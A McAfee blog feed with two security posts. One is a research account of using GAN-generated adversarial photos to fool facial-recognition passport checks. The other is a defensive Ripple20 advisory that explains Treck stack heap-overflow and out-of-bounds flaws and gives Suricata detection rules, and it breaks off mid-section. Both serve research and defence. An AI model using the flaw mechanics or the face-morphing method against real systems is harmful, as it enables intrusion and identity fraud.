McAfee Blogs https://www.mcafee.com/blogs Securing Tomorrow. Today. Wed, 05 Aug 2020 19:28:06 +0000 en-US hourly 1 https://wordpress.org/?v=5.4.2 https://www.mcafee.com/wp-content/uploads/2018/11/cropped-favicon-32x32.png McAfee Blogs https://www.mcafee.com/blogs 32 32 Dopple-ganging up on Facial Recognition Systems https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dopple-ganging-up-on-facial-recognition-systems/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dopple-ganging-up-on-facial-recognition-systems/#respond Wed, 05 Aug 2020 16:01:05 +0000 /blogs/?p=103413

Co-authored with Jesse Chick, OSU Senior and Former McAfee Intern, Primary Researcher. Special thanks to Dr. Catherine Huang, McAfee Advanced Analytics Team Special thanks to Kyle Baldes, Former McAfee Intern “Face” the Facts There are 7.6 Billion people in the world. That’s a huge number! In fact, if we all stood shoulder to shoulder on […]

The post Dopple-ganging up on Facial Recognition Systems appeared first on McAfee Blogs.

]]>

Co-authored with Jesse Chick, OSU Senior and Former McAfee Intern, Primary Researcher.

Special thanks to Dr. Catherine Huang, McAfee Advanced Analytics Team
Special thanks to Kyle Baldes, Former McAfee Intern

“Face” the Facts

There are 7.6 Billion people in the world. That’s a huge number! In fact, if we all stood shoulder to shoulder on the equator, the number of people in the world would wrap around the earth over 86 times! That’s just the number of living people today; even adding in the history of all people for all time, you will never find two identical human faces. In fact, in even some of the most similar faces recorded (not including twins) it is quite easy to discern multiple differences. This seems almost impossible; it’s just a face, right? Two eyes, a nose, a mouth, ears, eyebrows and potentially other facial hair. Surely, we would have run into identical unrelated humans by this point. Turns out, there’s SO much more to the human face than this which can be more subtle than we often consider; forehead size, shape of the jaw, position of the ears, structure of the nose, and thousands more extremely minute details.

You may be questioning the significance of this detail as it relates to McAfee, or vulnerability research. Today, we’ll explore some work undertaken by McAfee Advanced Threat Research (ATR) in the context of data science and security; specifically, we looked at facial recognition systems and whether they were more, or less susceptible to error than we as human beings.

Look carefully at the four images below; can you spot which of these is fake and which are real?

StyleGAN images

The answer may surprise you; all four images are completely fake – they are 100% computer-generated, and not just parts of different people creativally superimposed. An expert system known as StyleGAN generated each of these, and millions more, with varying degrees of photorealism, from scratch.

This impressive technology is equal parts revolutions in data science and emerging technology that can compute faster and cheaper at a scale we’ve never seen before. It is enabling impressive innovations in data science and image generation or recognition, and can be done in real time or near real time. Some of the most practical applications for this are in the field of facial recognition; simply put, the ability for a computer system to determine whether two images or other media represent the same person or not. The earliest computer facial recognition technology dates back to the 1960s, but until recently, has either been cost-ineffective, false positive or false negative prone, or too slow and inefficient for the intended purpose.

The advancements in technology and breakthroughs in Artificial Intelligence and Machine Learning have enabled several novel applications for facial recognition. First and foremost, it can be used as a highly reliable authentication mechanism; an outstanding example of this is the iPhone. Beginning with the iPhone X in 2017, facial recognition was the new de facto standard for authenticating a user to their mobile device. While Apple uses advanced features such as depth to map the target face, many other mobile devices have implemented more standard methods based on the features of the target face itself; things we as humans see as well, including placement of eyes, width of the nose, and other features that in combination can accurately identify a single user. More simplistic and standard methods such as these may inherently suffer from security limitations relative to more advanced capabilities, such as the 3D camera capture. In a way, this is the whole point; the added complexity of depth information is what makes pixel-manipulation attacks impossible.

Another emerging use case for facial recognition systems is for law enforcement. In 2019, the Metropolitan Police in London announced the rollout of a network of cameras designed to aid police in automating the identification of criminals or missing persons. While widely controversial, the UK is not alone in this initiative; other major cities have piloted or implemented variants of facial recognition with or without the general population’s consent. In China, many of the trains and bus systems leverage facial recognition to identify and authenticate passengers as they board or unboard. Shopping centers and schools across the country are increasingly deploying similar technology.

More recently, in light of racial profiling and racial bias demonstrated repeatedly in facial recognition AI, IBM announced that it would eliminate its facial recognition programs given the way it could be used in law enforcement. Since then, many other major players in the facial recognition business have suspended or eliminated their facial recognition programs. This may be at least partially based on a high profile “false positive” case in which authorities errantly based an arrest of an individual on an incorrect facial recognition match of a black man named Robert Williams. The case is known as the country’s first wrongful arrest directly resulting from facial recognition technology.

Facial recognition has some obvious benefits of course, and this recent article details the use of facial recognition technology in China to track down and reunite a family many years after an abduction. Despite this, it remains a highly polarizing issue with significant privacy concerns, and may require significant further development to reduce some of the inherent flaws.

Live Facial Recognition for Passport Validation

Our next use case for facial recognition may hit closer to home than you realize. Multiple airports, including many in the United States, have deployed facial recognition systems to aid or replace human interaction for passport and identity verification. In fact, I was able to experience one of these myself in the Atlanta airport in 2019. It was far from ready, but travellers can expect to see continued rollouts of this across the country. In fact, based on the global impact COVID-19 has had on travel and sanitization, we are observing an unprecedented rush to implement touchless solutions such as biometrics. This is of course being done from a responsibility standpoint, but also from an airlines and airport profitability perspective. If these two entities can’t convince travelers that their travel experience is low-risk, many voluntary travelers will opt to wait until this assurance is more solid. This article expands on the impact Coronavirus is having on the fledgling market use of passport facial recognition, providing specific insight into Delta and United Airlines’ rapid expansion of the tech into new airports immediately, and further testing and integration in many countries around the world. While this push may result in less physical contact and fewer infections, it may also have the side-effect of exponentially increasing the attack surface of a new target.

The concept of passport control via facial recognition is quite simple. A camera takes a live video and/or photos of your face, and a verification service compares it to an already-existing photo of you, collected earlier. This could be from a passport or a number of other sources such as the Department of Homeland Security database. The “live” photo is most likely processed into a similar format (image size, type of image) as the target photo, and compared. If it matches, the passport holder is authenticated. If not, an alternate source will be checked by a human operator, including boarding passes and forms of ID.

As vulnerability researchers, we need to be able to look at how things work; both the intended method of operation as well as any oversights. As we reflected on this growing technology and the extremely critical decisions it enabled, we considered whether flaws in the underlying system could be leveraged to bypass the target facial recognition systems. More specifically, we wanted to know if we could create “adversarial images” in a passport-style format, that would be incorrectly classified as a targeted individual. (As an aside, we performed related attacks in both digital and physical mediums against image recognition systems, including research we released on the MobilEye camera deployed in certain Tesla vehicles.)

The conceptual attack scenario here is simple. We’ll refer to our attacker as Subject A, and he is on the “no-fly” list – if a live photo or video of him matches a stored passport image, he’ll immediately be refused boarding and flagged, likely for arrest. We’ll assume he’s never submitted a passport photo. Subject A (AKA Jesse), is working together with Subject B (AKA Steve), the accomplice, who is helping him to bypass this system. Jesse is an expert in model hacking and generates a fake image of Steve through a system he builds (much more on this to come). The image has to look like Steve when it’s submitted to the government, but needs to verify Jesse as the same person as the adversarial fake “Steve” in the passport photo. As long as a passport photo system classifies a live photo of Jesse as the target fake image, he’ll be able to bypass the facial recognition.

If this sounds far-fetched to you, it doesn’t to the German government. Recent policy in Germany included verbiage to explicitly disallow morphed or computer-generated combined photos. While the techniques discussed in this link are closely related to this, the approach, techniques and artifacts created in our work vary widely. For example, the concepts of face morphing in general are not novel ideas anymore; yet in our research, we use a more advanced, deep learning-based morphing approach, which is categorically different from the more primitive “weighted averaging” face morphing approach.

Over the course of 6 months, McAfee ATR researcher and intern Jesse Chick studied state-of-the-art machine learning algorithms, read and adopted industry papers, and worked closely with McAfee’s Advanced Analytics team to develop a novel approach to defeating facial recognition systems. To date, the research has progressed through white box and gray box attacks with high levels of success – we hope to inspire or collaborate with other researchers on black box attacks and demonstrate these findings against real world targets such as passport verification systems with the hopes of improving them.

The Method to the Madness

The term GAN is an increasingly-recognized acronym in the data science field. It stands for Generative Adversarial Network and represents a novel concept using one or more “generators” working in tandem with one or more “discriminators.” While this isn’t a data science paper and I won’t go into great detail on GAN, it will be beneficial to understand the concept at a high level. You can think of GAN as a combination of an art critic and an art forger. An art critic must be capable of determining whether a piece of art is real or forged, and of what quality the art is. The forger of course, is simply trying to create fake art that looks as much like the original as possible, to fool the critic. Over time, the forger may outwit the critic, and at other times the opposite may hold true, yet ultimately, over the long run, they will force each other to improve and adapt their methods. In this scenario, the forger is the “generator” and the art critic is the “discriminator.” This concept is analogous to GAN in that the generator and discriminator are both working together and also opposing each other – as the generator creates an image of a face, for example, the discriminator determines whether the image generated actually looks like a face, or if it looks like something else. It rejects the output if it is not satisfied, and the process starts over. This is repeated in the training phase for as long of a time as it takes for the discriminator to be convinced that the generator’s product is high enough quality to “meet the bar.”

One such implementation we saw earlier, StyleGAN, uses these exact properties to generate the photorealistic faces shown above. In fact, the research team tested StyleGAN, but determined it was not aligned with the task we set out to achieve: generating photorealistic faces, but also being able to easily implement an additional step in face verification. More specifically, its sophisticated and niche architecture would have been highly difficult to harness successfully for our purpose of clever face-morphing. For this reason, we opted to go with a relatively new but powerful GAN framework known as CycleGAN.

CycleGAN

CycleGAN is a GAN framework that was released in a paper in 2017. It represents a GAN methodology that uses two generators and two discriminators, and in its most basic sense, is responsible for translating one image to another through the use of GAN.

Image of zebras translated to horses via CycleGAN

There are some subtle but powerful details related to the CycleGAN infrastructure. We won’t go into depth on these, but one important concept is that CycleGAN uses higher level features to translate between images. Instead of taking random “noise” or “pixels” in the way StyleGAN translates into images, this model uses more significant features of the image for translation (shape of head, eye placement, body size, etc…). This works very well for human faces, despite the paper not specifically calling out human facial translation as a strength.

Face Net and InceptionResnetV1

While CycleGAN is an novel use of the GAN model, in and of itself it has been used for image to image translation numerous times. Our facial recognition application facilitated the need for an extension of this single model, with an image verification system. This is where FaceNet came into play. The team realized that not only would our model need to accurately create adversarial images that were photorealistic, it would also need to be verified as the original subject. More on this shortly. FaceNet is a face recognition architecture that was developed by Google in 2015, and was and perhaps still is considered state of the art in its ability to accurately classify faces. It uses a concept called facial embeddings to determine mathematical distances between two faces in a dimension. For the programmers or math experts, 512 dimensional space is used, to be precise, and each embedding is a 512 dimensional list or vector. To the lay person, the less similar the high level facial features are, the further apart the facial embeddings are. Conversely, the more similar the facial features, the closer together these faces are plotted. This concept is ideal for our use of facial recognition, given FaceNet operates against high level features of the face versus individual pixels, for example. This is a central concept and a key differentiator between our research and “shallow”adversarial image creation a la more traditionally used FGSM, JSMA, etc. Creating an attack that operates at the level of human-understandable features is where this research breaks new ground.

One of the top reasons for FaceNet’s popularity is that is uses a pre-trained model with a data set trained on hundreds of millions of facial images. This training was performed using a well-known academic/industry-standard dataset, and these results are readily available  for comparison. Furthermore, it achieved very high published accuracy (99.63%) when used on a set of 13,000 random face images from a benchmark set of data known as LFW (Labeled Faces in the Wild). In our own in-house evaluation testing, our accuracy results were closer to 95%.

Ultimately, given our need to start with a white box to understand the architecture, the solution we chose was a combination of CycleGAN and an open source FaceNet variant architecture known as InceptionResnet version 1. The ResNet family of deep neural networks uses learned filters, known as convolutions, to extract high-level information from visual data. In other words, the role of deep learning in face recognition is to transform an abstract feature from the image domain, i.e. a subject’s identity, into a domain of vectors (AKA embeddings) such that they can be reasoned about mathematically. The “distance” between the outputs of two images depicting the same subject should be mapped to a similar region in the output space, and two very different regions for input depicting different subjects. It should be noted that the success or failure of our attack is contingent on its ability to manipulate the distance between these face embeddings. To be clear, FaceNet is the pipeline consisting of data pre-processing, Inception ResNet V1, and data separation via a learned distance threshold.

Training

Whoever has the most data wins. This truism is especially relevant in the context of machine learning. We knew we would need a large enough data set to accurately train the attack generation model, but we guessed that it would be smaller than many other use cases. This is because given our goal was simply to take two people, subject A (Jesse) and subject B (Steve) below and minimize the “distance” between the two face embeddings produced when inputted into FaceNet, while preserving a misclassification in either direction. In other words, Jesse needed to look like Jesse in his passport photo, and yet be classified as Steve, and vice versa. We’ll describe facial embeddings and visualizations in detail shortly.

The training was done on a set of 1500 images of each of us, captured from live video as stills. We provided multiple expressions and facial gestures that would enrich the training data and accurately represent someone attempting to take a valid passport photo.

The research team then integrated the CycleGAN + FaceNet architecture and began to train the model.

As you can see from the images below, the initial output from the generator is very rough – these certainly look like human beings (sort of), but they’re not easily identifiable and of course have extremely obvious perturbations, otherwise known as “artifacts.”

However, as we progress through training over dozens of cycles, or epochs, a few things are becoming more visually apparent. The faces begin to clean up some of the abnormalities while simultaneously blending features of both subject A and subject B. The (somewhat frightening) results look something like this:

Progressing even further in the training epochs, and the discriminator is starting to become more satisfied with the generator’s output. Yes, we’ve got some detail to clean up, but the image is starting to look much more like subject B.

A couple hundred training epochs in, and we are producing candidates that would meet the bar for this application; they would pass as valid passport photos.

Fake image of Subject B

Remember, that with each iteration through this training process, the results are systematically fed into the facial recognition neural network and classified as Subject A or Subject B. This is essential as any photo that doesn’t “properly misclassify” as the other, doesn’t meet one of the primary objectives and must be rejected. It is also a novel approach as there are very few research projects which combine a GAN and an additional neural network in a cohesive and iterative approach like this.

We can see visually above that the faces being generated at this point are becoming real enough to convince human beings that they are not computer-generated. At the same time, let’s look behind the curtain and see some facial embedding visualizations which may help clarify how this is actually working.

To further understand facial embeddings, we can use the following images to visualize the concept. First, we have the images used for both training and generation of images. In other words, it contains real images from our data set and fake (adversarial) generated images as shown below:

Model Images (Training – Real_A & Real_B) – Generated (Fake_B & Fake_A)

This set of images is just one epoch of the model in action – given the highly realistic fake images generated here, it is not surprisingly a later epoch in the model evaluation.

To view these images as mathematical embeddings, we can use a visualization representing them on a multidimensional plane, which can be rotated to show the distance between them. It’s much easier to see that this model represents a cluster of “Real A” and “Fake B” on one side, and a separate cluster of “Real B” and “Fake A” on the other. This is the ideal attack scenario as it clearly shows how the model will confuse the fake image of the accomplice with the real image of the attacker, our ultimate test.

White Box and Gray Box Application

With much of machine learning, the model must be both effectively trained as well as able to reproduce and replicate results in future applications. For example, consider a food image classifier; its job being to correctly identify and label the type of food it sees in an image. It must have a massive training set so that it recognizes that a French Fry is different than a crab leg, but it also must be able to reproduce that classification on images of food it’s never seen before with a very high accuracy. Our model is somewhat different in that it is trained specifically on two people only (the adversary and the accomplice), and its job is done ahead of time during training. In other words, once we’ve generated a photorealistic image of the attacker that is classified as the accomplice, the model’s job is done. One important caveat is that it must work reliably to both correctly identify people and differentiate people, much like facial recognition would operate in the real world.

The theory behind this is based on the concept of transferability; if the models and features chosen in the development phase (called white box, with full access to the code and knowledge of the internal state of the model and pre-trained parameters) are similar enough to the real-world model and features (black box, no access to code or classifier) an attack will reliably transfer – even if the underlying model architecture is vastly different. This is truly an incredible concept for many people, as it seems like an attacker would need to understand every feature, every line of code, every input and output, to predict how a model will classify “adversarial input.” After all, that’s how classical software security works for the most part. By either directly reading or reverse engineering a piece of code, an attacker can figure out the precise input to trigger a bug. With model hacking (often called adversarial machine learning), we can develop attacks in a lab and transfer them to black box systems. This work, however, will take us through white box and gray box attacks, with possible future work focusing on black box attacks against facial recognition.

As mentioned earlier, a white box attack is one that is developed with full access to the underlying model – either because the researcher developed the model, or they are using an open source architecture. In our case, we did both to identify the ideal combination discussed above, integrating CycleGAN with various open source facial recognition models. The real Google FaceNet is proprietary, but it has been effectively reproduced by researchers as open source frameworks that achieve very similar results, hence our use of Inception Resnet v1. We call these versions of the model “gray box” because they are somewhere in the middle of white box and black box.

To take the concepts above from theory to the real world, we need to implement a physical system that emulates a passport scanner. Without access to the actual target system, we’ll simply use an RGB camera, such as the external one you might see on desktops in a home or office. The underlying camera is likely quite similar to the technology used by a passport photo camera. There’s some guesswork needed to determine what the passport camera is doing, so we take some educated liberties. The first thing to do is programmatically capture every individual frame from the live video and save them in memory for the duration of their use. After that, we apply some image transformations, scaling them to a smaller size and appropriate resolution of a passport-style photo. Finally, we pass each frame to the underlying pretrained model we built and ask it to determine whether the face it is analyzing is Subject A (the attacker), or Subject B (the accomplice). The model has been trained on enough images and variations of both that even changes in posture, position, hair style and more will still cause a misclassification. It’s worth noting that in this attack method, the attacker and accomplice are working together and would likely attempt to look as similar as possible to the original images in the data set the model is trained, as it would increase the overall misclassification confidence.

The Demos

The following demo videos demonstrate this attack using our gray box model. Let’s introduce the 3 players in these videos. In all three, Steve is the attacker now, Sam is our random test person, and Jesse is our accomplice. The first will show the positive test.

Positive Test:

This uses a real, non-generated image on the right side of the screen of Steve (now acting as our attacker). Our random test person (Sam), first stands in front of the live “passport verification camera” and is compared against the real image of Steve. They should of course be classified as different. Now Steve stands in front of the camera and the model correctly identifies him against his picture, taken from the original and unaltered data set. This proves the system can correctly identify Steve as himself.

Negative Test:

Next is the negative test, where the system tests Sam against a real photo of Jesse. He is correctly classified as different, as expected. Then Steve stands in front of the system and confirms the negative test as well, showing that the model correctly differentiates people in non-adversarial conditions.

Adversarial Test:

Finally, in the third video, Sam is evaluated against an adversarial, or fake image of Jesse, generated by our model. Since Sam was not part of the CycleGAN training set designed to cause misclassification, he is correctly shown as different again. Lastly, our attacker Steve stands in front of the live camera and is correctly misclassified as Jesse (now the accomplice). Because the model was trained for either Jesse or Steve to be the adversarial image, in this case we chose Jesse as the fake/adversarial image.

If a passport-scanner were to replace a human being completely in this scenario, it would believe it had just correctly validated that the attacker was the same person stored in the passport database as the accomplice. Given the accomplice is not on a no-fly list and does not have any other restrictions, the attacker can bypass this essential verification step and board the plane. It’s worth noting that a human being would likely spot the difference between the accomplice and attacker, but this research is based off of the inherent risks associated with reliance on AI and ML alone, without providing defense-in-depth or external validation, such as a human being to validate.

Positive Test Video – Confirming Ability to Recognize a Person as Himself

Negative Test Video – Confirming Ability to Tell People Apart

Adversarial Test Video – Confirming Ability to Misclassify with Adversarial Image

What Have we Learned?

Biometrics are an increasingly relied-upon technology to authenticate or verify individuals and are effectively replacing password and other potentially unreliable authentication methods in many cases. However, the reliance on automated systems and machine learning without considering the inherent security flaws present in the mysterious internal mechanics of face-recognition models could provide cyber criminals unique capabilities to bypass critical systems such as automated passport enforcement. To our knowledge, our approach to this research represents the first-of-its-kind application of model hacking and facial recognition. By leveraging the power of data science and security research, we look to work closely with vendors and implementors of these critical systems to design security from the ground up, closing the gaps that weaken these systems. As a call to action, we look to the community for a standard by which can reason formally about the reliability of machine learning systems in the presence of adversarial samples. Such standards exist in many verticals of computer security, including cryptography, protocols, wireless radio frequency and many more. If we are going to continue to hand off critical tasks like authentication to a black box, we had better have a framework for determining acceptable bounds for its resiliency and performance under adverse conditions.

For more information on research efforts by McAfee Advanced Threat Research, please follow our blog or visit our website.

The post Dopple-ganging up on Facial Recognition Systems appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dopple-ganging-up-on-facial-recognition-systems/feed/ 0
Ripple20 Critical Vulnerabilities – Detection Logic and Signatures https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-critical-vulnerabilities-detection-logic-and-signatures/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-critical-vulnerabilities-detection-logic-and-signatures/#respond Wed, 05 Aug 2020 13:00:05 +0000 /blogs/?p=104523

This document has been prepared by McAfee Advanced Threat Research in collaboration with JSOF who discovered and responsibly disclosed the vulnerabilities. It is intended to serve as a joint research effort to produce valuable insights for network administrators and security personnel, looking to further understand these vulnerabilities to defend against exploitation. The signatures produced here […]

The post Ripple20 Critical Vulnerabilities – Detection Logic and Signatures appeared first on McAfee Blogs.

]]>

This document has been prepared by McAfee Advanced Threat Research in collaboration with JSOF who discovered and responsibly disclosed the vulnerabilities. It is intended to serve as a joint research effort to produce valuable insights for network administrators and security personnel, looking to further understand these vulnerabilities to defend against exploitation. The signatures produced here should be thoroughly considered and vetted in staging environments prior to being used in production and may benefit from specific tuning to the target deployment. There are technical limitations to this work, including the fact that more complex methods of detection might be required to detect these vulnerabilities. For example, multiple layers of encapsulation may obfuscate the exploitation of the flaws and increase the difficulty of detection.

We have also provided packet captures taken from the vulnerability Proof-of-Concepts as artifacts for testing and deployment of either the signatures below or customized signatures based on the detection logic. Signatures and Lua Scripts are located on ATR’s Github page, as well as inline and in the appendix of this document respectively.

As of this morning (August 5th), JSOF has presented additional technical detail and exploitation analysis at BlackHat 2020, on the two most critical vulnerabilities in DNS.

The information provided herein is subject to change without notice, and is provided “AS IS”, with all faults, without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance and for use at your own risk. Additionally, we cannot guarantee any performance or efficacy benchmarks for any of the signatures.

Integer Overflow in tfDnsExpLabelLength Leading to Heap Overflow and RCE

CVE: CVE-2020-11901 (Variant 1)
CVSS: 9
Protocol(s): DNS over UDP (and likely DNS over TCP)
Port(s): 53

Vulnerability description:
In the Treck stack, DNS names are calculated via the function tfDnsExpLabelLength. A bug exists in this function where the computation is performed using an unsigned short, making it possible to overflow the computed value with a specially constructed DNS response packet. Since tfDnsExpLabelLength computes the full length of a DNS name after it is decompressed, it is possible to induce an overflow using a DNS packet far smaller than 216 bytes. In some code paths, tfGetRawBuffer is called shortly after tfDnsExpLabelLength, allocating a buffer on the heap where the DNS name will be stored using the size computed by tfDnsExpLabelLength, thus leading to a heap overflow and potential RCE.
While newer versions of the Treck stack will stop copying the DNS name into the buffer as soon as a character that isn’t alphanumeric or a hyphen is reached, older versions do not have this restriction and further use predictable transaction IDs for DNS queries, making this vulnerability easier to exploit.

Limitations or special considerations for detection:

Ideally, detection logic for this vulnerability would involve independently computing the uncompressed length of all DNS names contained within incoming DNS responses. Unfortunately, this may be computationally expensive for a device to perform for every incoming DNS response, especially since each one may contain many DNS names. Instead, we must rely on a combination of heuristics.

Furthermore, it is currently unclear whether exercising this vulnerability is possible when using EDNS(0) or DNS over TCP. We recommend assuming it is possible for the purposes of implementing detection logic.  During our testing, an inconsistency in how Suricata handled DNS over TCP was discovered – in some cases it was correctly identified as DNS traffic and in other cases, it was not. Consequently, two rules have been created to determine the size of DNS over TCP traffic. The second rule uses the TCP primitive instead of the DNS primitive; however, the second rule will only be evaluated if not flagged by the first rule.

Because the Suricata rule in dns_invalid_size.rules uses the DNS responses’ EDNS UDP length, which may be controlled by the attacker, a second upper limit of 4096 bytes is enforced.

Recommended detection criteria:

  • The device must be capable of processing DNS traffic and matching responses to their corresponding requests.
  • The device must be capable of identifying individual DNS names within individual DNS packets.
  • The device should flag any DNS responses whose size exceeds what is “expected”. The expected size depends on the type of DNS packet sent:
    • For DNS over TCP, the size should not exceed the value specified in the first two bytes of the TCP payload.
    • For DNS over UDP with EDNS(0), the size should not exceed the value negotiated in the request, which is specified in the CLASS field of the OPT RR, if present.
    • For DNS over UDP without EDNS(0), the size should not exceed 512 bytes.
    • These are all checked in dns_invalid_size.rules, which invokes either dns_size.lua or dns_tcp_size.lua for the logic.
  • The device should flag DNS responses containing DNS names exceeding 255 bytes (prior to decompression).
    • This is checked in dns_invalid_name.rules, which invokes dns_invalid_name.lua for the logic.
  • The device should flag DNS responses containing DNS names comprised of characters besides a-z, A-Z, 0-9, “-”, “_”, and “*”.
    • This is also checked in dns_invalid_name.rules, which invokes dns_invalid_name.lua for the logic.
  • The device should flag DNS responses containing a large number of DNS compression pointers, particularly pointers one after the other. The specific tolerance will depend on the network.
    • The device should count all labels starting with the bits 0b10, 0b01, or 0b11 against this pointer total, as vulnerable versions of the Treck stack (incorrectly) classify all labels where the first two bits aren’t 0b00 as compression pointers. In the Lua script, we treat any value above 63 (0x3F) as a pointer for this reason, as any value in that range will have at least one of these bits set.
    • The specific thresholds were set to 40 total pointers in a single DNS packet or 4 consecutive pointers for our implementation of this rule. These values were chosen since they did not seem to trigger any false positives in a very large test PCAP but should be altered as needed to suit typical traffic for the network the rule will be deployed on. The test for consecutive pointers is especially useful since each domain name should only ever have one pointer (at the very end), meaning we should never be seeing many pointers in a row in normal traffic.
    • This is implemented in dns_heap_overflow_variant_1.lua, which is invoked by dns_heap_overflow.rules.
  • Implementation of the detection logic above has been split up amongst several Suricata rule files since only the pointer counting logic is specific to this vulnerability. Detection of exploits leveraging this vulnerability are enhanced with the addition of the DNS layer size check, domain name compressed length check, and domain name character check implemented in the other rules, but these are considered to be “helper” signatures and flagging one of these does not necessarily indicate an exploitation attempt for this specific vulnerability.

False positive conditions (signatures detecting non-malicious traffic):

Networks expecting non-malicious traffic containing DNS names using non-alphanumeric characters or an abnormally large number of DNS compression pointers may generate false positives. Unfortunately, checking for pointers in only the domain name fields is insufficient, as a malicious packet could use a compression pointer that points to an arbitrary offset within said packet, so our rule instead checks every byte of the DNS layer. Consequently, Treck’s overly liberal classification of DNS compression pointers means that our rule will often misclassify unrelated bytes in the DNS payload as pointers.

In our testing, we ran into false positives with domain names containing spaces or things like “https://”. Per the RFCs, characters such as “:” and “/” should not be present in domain names but may show up from time to time in real, non-malicious traffic. The list of acceptable characters should be expanded as needed for the targeted network to avoid excessive false positives. That being said, keeping the list of acceptable characters as small as possible will make it more difficult to sneak in shellcode to leverage one of the Ripple20 DNS vulnerabilities.

False positives on the DNS size rules may occur when DNS over TCP is used if Suricata does not properly classify the packet as a DNS packet – something that has occurred multiple times during our testing. This would cause the second size check to occur, which assumes that all traffic over port 53 is DNS traffic and processes the payload accordingly. As a result, any non-DNS traffic on TCP port 53 may cause false positives in this specific case. It is recommended the port number in the rule be adjusted for any network where a different protocol is expected over port 53.

Fragmentation of DNS traffic over TCP may also introduce false positives. If the streams are not properly reconstructed at the time the rules execute on the DNS payload, byte offsets utilized in the attached Lua scripts could analyze incorrect data. Fragmentation in DNS response packets is not common on a standard network unless MTU values have been set particularly low. Each rule should be evaluated independently prior to use in production based on specific network requirements and conditions.

False negative conditions (signatures failing to detect vulnerability/exploitation):

False negatives are more likely as this detection logic relies on heuristics due to computation of the uncompressed DNS name length being too computationally expensive. Carefully constructed malicious packets may be able to circumvent the suggested pointer limitations and still trigger the vulnerability.

Signature(s):

dns_invalid_size.rules:

alert dns any any ‑> any any (msg:"DNS packet too large"; flow:to_client; flowbits:set,flagged; lua:dns_size.lua; sid:2020119014; rev:1;)

Lua script (dns_size.lua) can be found in Appendix A

alert tcp any 53 -> any any (msg:"DNS over TCP packet too large"; flow:to_client,no_frag; flowbits:isnotset,flagged; lua:dns_tcp_size.lua; sid:2020119015; rev:1;)

Lua script (dns_tcp_size.lua) can be found in Appendix A

dns_invalid_name.rules:

alert dns any any -> any any (flow:to_client; msg:"DNS response contains invalid domain name"; lua:dns_invalid_name.lua; sid:2020119013; rev:1;)

Lua script (dns_invalid_name.lua) can be found in Appendix A

dns_heap_overflow.rules:

# Variant 1

alert dns any any -> any any (flow:to_client; msg:"Potential DNS heap overflow exploit (CVE-2020-11901)"; lua:dns_heap_overflow_variant_1.lua; sid:2020119011; rev:1;)

Lua script (dns_heap_overflow_variant_1.lua) can be found in Appendix A

RDATA Length Mismatch in DNS CNAME Records Causes Heap Overflow

CVE: CVE-2020-11901 (Variant 2)
CVSS: 9
Protocol(s): DNS/UDP (and likely DNS/TCP)
Port(s): 53

Vulnerability description:

In some versions of the Treck stack, a vulnerability exists in the way the stack processes DNS responses containing CNAME records. In such records, the length of the buffer allocated to store the DNS name is taken from the RDLENGTH field, while the data written is the full, decompressed domain name, terminating only at a null byte. As a result, if the size of the decompressed domain name specified in RDATA exceeds the provided RDLENGTH in a CNAME record, the excess is written past the end of the allocated buffer, resulting in a heap overflow and potential RCE.

Limitations or special considerations for detection:

Although exploitation of this vulnerability has been confirmed using malicious DNS over UDP packets, it has not been tested using DNS over TCP and it is unclear if such packets would exercise the same vulnerable code path. Until this can be confirmed, detection logic should assume both vectors are vulnerable.

Recommended detection criteria:

  • The device must be capable of processing incoming DNS responses.
  • The device must be capable of identifying CNAME records within DNS responses
  • The device should flag all DNS responses where the actual size of the RDATA field for a CNAME record exceeds the value specified in the same record’s RDLENGTH field.
    • In this case, the “actual size” corresponds to how vulnerable versions of the Treck stack compute the RDATA length, which involves adding up the size of every label until either null byte, a DNS compression pointer, or the end of the payload is encountered. The Treck stack will follow and decompress the pointer that terminates the domain name, if present, but the script does not as this computation is simply too expensive, as mentioned previously.

False positive conditions (signatures detecting non-malicious traffic):

False positives should be unlikely, but possible in scenarios where network devices send non-malicious traffic where RDLENGTH is not equal to the size of RDATA, thereby breaking RFC 1035.

False negative conditions (signatures failing to detect vulnerability/exploitation):

Since the detection logic does not perform decompression when computing the “actual size” of RDATA, it will fail to detect malicious packets that contain domain names whose length only exceeds RDLENGTH after decompression. Unfortunately, coverage for this case is non-trivial as such packets are actually RFC-compliant. According to RFC 1035, section 4.1.4:

If a domain name is contained in a part of the message subject to a length field (such as the RDATA section of an RR), and compression is used, the length of the compressed name is used in the length calculation, rather than the length of the expanded name.

Besides the computational overhead, enforcing such a check would likely result in very high false positive rates.

Signature(s):

dns_heap_overflow.rules:

# Variant 2

alert dns any any -> any any (flow:to_client; msg:"Potential DNS heap overflow exploit (CVE-2020-11901)"; lua:dns_heap_overflow_variant_2.lua; sid:2020119012; rev:1;)
Lua script (dns_heap_overflow_variant_2.lua) can be found in Appendix A

Write Out-of-Bounds Using Routing Header Type 0

CVE: CVE-2020-11897
CVSS: 10
Protocol(s): IPv6
Port(s): N/A

Vulnerability description:

When processing IPv6 incoming packets, an inconsistency parsing the IPv6 routing header can be triggered where the header length is checked against the total packet and not against the fragment length. This means that if we send fragmented packets with the overall size greater than or equal to the specified routing header length, then we process the routing header under the assumption that we have enough bytes in our current fragment (where we have enough bytes in the overall reassembled packet only). Thus, using routing header type 0 (RH0) we can force read and write into out-of-bounds memory location.

There is also a secondary side effect where we can get an info leak in a source IPv6 address in an ICMP parameter returned from the device.

Limitations or special considerations for detection:

The RFC for RH0 defines the length field as equal to “two times the number of addresses in the header.”  For example, if the routing header length is six, then there are three IPv6 addresses expected in the header. Upon reconstruction of the fragmented packets, the reported number of addresses is filled with data from the fragments that follow. This creates “invalid” IPv6 addresses in the header and potentially malforms the next layer of the packet. During exploitation, it would also be likely for the next layer of the packet to be malformed. Although ICMP can be used to perform an information leak, it is possible for the next layer to be any type and therefore vary in length. Verification of the length of this layer could therefore be very expensive and non-deterministic.

Recommended detection criteria:

  • The device must be capable of processing fragmented IPv6 traffic
  • The device should inspect fragmented packets containing Routing Header type 0 (RH0). If a RH0 IPv6 packet is fragmented, then the vulnerability is likely being exploited
  • If the length of the IPv6 layer of a packet fragment containing the RH0 header is less than the length reported in the routing header, then the vulnerability is likely being exploited
  • Upon reconstruction of the fragmented packets, if the header of the layer following IPv6 is malformed, the vulnerability may be being exploited

Notes:

